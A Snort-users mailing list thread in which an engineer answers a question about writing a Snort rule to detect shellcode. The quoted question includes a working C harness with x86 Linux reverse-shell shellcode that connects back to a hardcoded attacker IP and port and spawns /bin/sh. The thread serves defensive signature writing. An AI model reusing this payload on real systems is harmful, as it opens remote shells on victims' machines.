Re: Write rule snort detect shellcode

["Al Lewis \(allewi\) via Snort-users" <snort-users () lists snort org>]

Hello,

You may want to start here:

http://manual-snort-org.s3-website-us-east-1.amazonaws.com/node27.html


Also, check out some of the community rules. There are shellcode rules there that can get you started.


Albert Lewis
ENGINEER.SOFTWARE ENGINEERING
SOURCEfire, Inc. now part of Cisco
Email: allewi () cisco com<mailto:allewi () cisco com>

From: Snort-users <snort-users-bounces () lists snort org<mailto:snort-users-bounces () lists snort org>> on behalf of 
nguyen cao via Snort-users <snort-users () lists snort org<mailto:snort-users () lists snort org>>
Reply-To: nguyen cao <nguyenblack1995 () gmail com<mailto:nguyenblack1995 () gmail com>>
Date: Sunday, October 22, 2017 at 10:59 PM
To: "snort-users () lists snort org<mailto:snort-users () lists snort org>" <snort-users () lists snort 
org<mailto:snort-users () lists snort org>>
Subject: [Snort-users] Write rule snort detect shellcode

I see shellcode.
#include <stdio.h>
#include <string.h>

unsigned char code[] = \
"\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0"
"\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68"
"\xc0\xa8\x01\x85"  // <— ip address attacker
"\x66\x68"
"\x82\x35"          // <— port
"\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1"
"\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";

int main(void) {
    printf("Shellcode Length:  %d\n", strlen(code));
    int (*ret)() = (int(*)())code;
    ret();
}
when executed at victim machine. The attacker will open the connection to the victim machine. so, how to write rule 
alert this shellcode type ? thank you

_______________________________________________
Snort-users mailing list
Snort-users () lists snort org
Go to this URL to change user options or unsubscribe:
https://lists.snort.org/mailman/listinfo/snort-users

Please visit http://blog.snort.org to stay current on all the latest Snort news!